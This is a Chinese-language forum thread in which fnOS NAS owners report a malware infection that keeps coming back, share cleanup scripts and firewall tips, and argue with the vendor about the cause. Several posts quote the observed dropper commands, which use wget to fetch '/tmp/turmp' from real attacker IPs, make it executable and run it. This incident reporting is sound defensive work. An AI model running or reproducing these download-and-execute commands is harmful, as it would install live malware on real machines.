fnos 恶意程序分析

mark8776661

更新了1.1.18 中午查了一下又有了

1337

free~burning 发表于 2026-2-1 02:49
怎么办呢？这个文件要怎么处理呢？

建议重新安装系统，非必要不要把机器暴露在公网上，尽量最小化攻击面。

关言己

zSdawdaz 发表于 2026-2-1 11:19
反而要感谢爱快能看出连接数异常发现问题

op也能看出来啊，但是到现在没发现放出的op的截图

1337

飞牛社区主理人 发表于 2026-1-31 12:41
感谢分享，分析很精彩，该问题官方已知，经过技术分析追踪该行为是是在公网暴露服务的情况下，开启http明文 ...

“应用中心”上架的应用所引发的安全漏洞，官方会负责处理吗？在系统自带的应用中心内上架的三方应用，官方会对三方开发者的软件进行安全审计吗？

nijpatin

mark8776661 发表于 2026-2-1 13:14
更新了1.1.18  中午查了一下又有了

不会吧1.1.18还有？   

litchi

success 发表于 2026-2-1 00:51
国内快速链接V2版本
先sudo -i
curl -ksSL https://gitee.com/amdev/sh/raw/master/fn/fnos_xxck1.sh -o  ...

[危险] 发现恶意文件: /usr/trim/bin/wsdd2

这个是危险还是误报

fun5201314

mark8776661 发表于 2026-2-1 13:14
更新了1.1.18  中午查了一下又有了

应该是病毒在你存储空间里面
需要删除了在重装系统

fun5201314

某摆烂咸鱼 发表于 2026-2-1 02:06
存在严重的路径穿越漏洞，可以未授权访问nas任意文件，不去主动发通知经过用户升级，私底下偷偷修复然后 ...

错了就要立正挨打，别犟

rufengsuixing

飞牛社区主理人 发表于 2026-1-31 12:41
感谢分享，分析很精彩，该问题官方已知，经过技术分析追踪该行为是是在公网暴露服务的情况下，开启http明文 ...

更新不上去怎么办

rufengsuixing

飞牛社区主理人 发表于 2026-2-1 09:18
升级最新的系统版本

升级不上去呀

fun5201314

有公网IP的和域名的最好是安装雷池反代下毕竟安全第一

jzhou2012

我好像一直没事从1.1.15到1.1.18,可能我没开过ipv6，一直龟缩在电信给的Ipv4地址，内网地址。

lucienyida

litchi 发表于 2026-2-1 14:34
[危险] 发现恶意文件: /usr/trim/bin/wsdd2

这个是危险还是误报

对啊  这个/usr/trim/bin/wsdd2待敌是不是恶意文件

纯白色的背带

zSdawdaz 发表于 2026-2-1 11:14
你这个貌似允许通过吧

局域网IP加白名单了

rufengsuixing

master-matt 发表于 2026-2-1 02:17
好像又多了个恶意程序模块 async_memcpys 😭

rpcd_lsad 占用贼高，干不掉

aurora8464

昨天晚上用大佬的清理脚本和手动删除搞了一晚上。每次貌似删除干净了，过几分钟后又发现wget进程开始下载木马脚本了。今天早上升级完1.1.18，刚开始貌似正常了，检测脚本未检出。过了几分钟在此运行脚本，发现又在连接可疑IP。执行命令 ps -ef --forest | grep -A 10 -B 10 wget，又发现wget在下载木马了。没办法，只能删除了/usr/bin/wget，才算消停。只要重新安装wget，不用几分钟就会开始下载木马，应该是恶意脚本没有清理干净。目前使用的杀毒清理还没完全弄干净。

chyiyang

阿乐x 发表于 2026-1-31 22:35
wget http://43.198.11.122/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp，这个就是吧
...

升级到1.1.18了，还是和你一样的问题，感觉升级完作用不大,打算重做系统了

chyiyang

阿勇哥 发表于 2026-2-1 09:16
清理不干净，发现有链接到别的服务器地址去下载了恶意程序

升级到1.1.18，不起作用，还是存在这样的问题

潴小帅〔185

我把系统都关机了，疯狂连接同一ip（188.40.203.74)相同端口，达到好几百个连接，算轻的了

瓶中沙ᯤ⁹

我中了。。。

wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp

wget http://43.198.11.122/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp

阿勇哥

chyiyang 发表于 2026-2-1 18:51
升级到1.1.18，不起作用，还是存在这样的问题

我重装前清理了，目前没有发现问题

wotemezuile

关闭了对外端口；升级1.1.18 然后用那脚本检测还有，又清理了下，目前用脚本看是没有。

Rednofsky

升级到最新版本前我更新了下脚本，昨天显示都清理干净了但是今天两个涉及trim的文件又重新被感染了，不知道是不是wget还有在下载新的木马，刚才更新系统了重启下看看脚本是否还能检出

Rednofsky

Rednofsky 发表于 2026-2-1 21:54
升级到最新版本前我更新了下脚本，昨天显示都清理干净了但是今天两个涉及trim的文件又重新被感染了，不知道 ...

目前重新用脚本看是没有检出，网络流量暂时正常，防火墙阻断了境外ip，不知道是否仍奏效，主要是不想重装系统会很麻烦，后续再多看看

菠萝密多斩

zzkkoo8 发表于 2026-1-31 14:35
通过飞牛官方connect访问如何把   飞牛挂载在雷池前面？

FN CONNECT  好像不行  雷池只能防外网的

FNAS!

船桨不是地 发表于 2026-2-1 02:15
使用后发现会将飞牛同步识别成恶意服务。

我是在电脑上重新登录一下飞牛同步就好了

nijpatin

fun5201314 发表于 2026-2-1 15:44
有公网IP的和域名的最好是安装雷池反代下毕竟安全第一

雷池只能添加10个网站防护，没法用

17193400903

昨天检测，发现已经感染了。随机进行了清理，正常了。但是今天早上发现cpu又上去下不来了，一检测还有病毒，昨天完善检测清理完是正常的了。感觉杀不干净。今早清理后重启CPU还是一直高，只能先关机了。 已经1.1.18了，现在再检测更新，会报错

sicifus

17193400903 发表于 2026-2-2 11:22
昨天检测，发现已经感染了。随机进行了清理，正常了。但是今天早上发现cpu又上去下不来了，一检测还有病毒 ...

检测更新报错是因为更新地址已经被恶意脚本替换掉了，
感觉大量老版本会因为这个原因没法升级补漏洞，成为肉**，
要解决只能格掉重装1.1.18系统了

breeze_npHXh

供参考，使用claude code + glm4.7 清除了感染，目测以后红蓝攻防就是神仙斗法，甚至恶意软件安装小模型动态反白帽，看谁模型强，绝了
https://scared-heart.github.io/fnos_rootkit_incident_2026/

admin

LeoJ 发表于 2026-2-1 11:18
自动查杀能力在哪里，没找到

升级后自动进行的

aurora8464

breeze_npHXh 发表于 2026-2-2 14:35
供参考，使用claude code + glm4.7 清除了感染，目测以后红蓝攻防就是神仙斗法，甚至恶意软件安装小模型动 ...

感谢这位大大，非常完整的排查过程。之前用过的清理脚本确实漏了一个内核模块，这下应该是搞定了。

Jalloc

飞牛社区主理人 发表于 2026-1-31 14:06
不纯是公网原因，明文访问方式才是高风险的关键，有公网的情况下，强制HTTPS能避免当前情况 ...

真的没想要发言，特意注册个账号来的。这从表现上来看，一方面是系统权限的问题，一方面是公网的问题，反倒跟http和https没有任何关系，我特意把关机的那一台旧版系统打开验证过，https对这个问题没有任何帮助。都是搞技术的，有一说一就是了，又没收我们钱，我没有要求你们保证什么，但是不要说一些看起来有道理实际上把人当**的话，这是个态度问题。

lloll

都过了5天，昨天才知道有这个漏洞，居然没中毒。没用官方的 FNct ,自己做vpn,外网访问nas 用的高端口号，而且做了lucky 代理。禁止了国外IP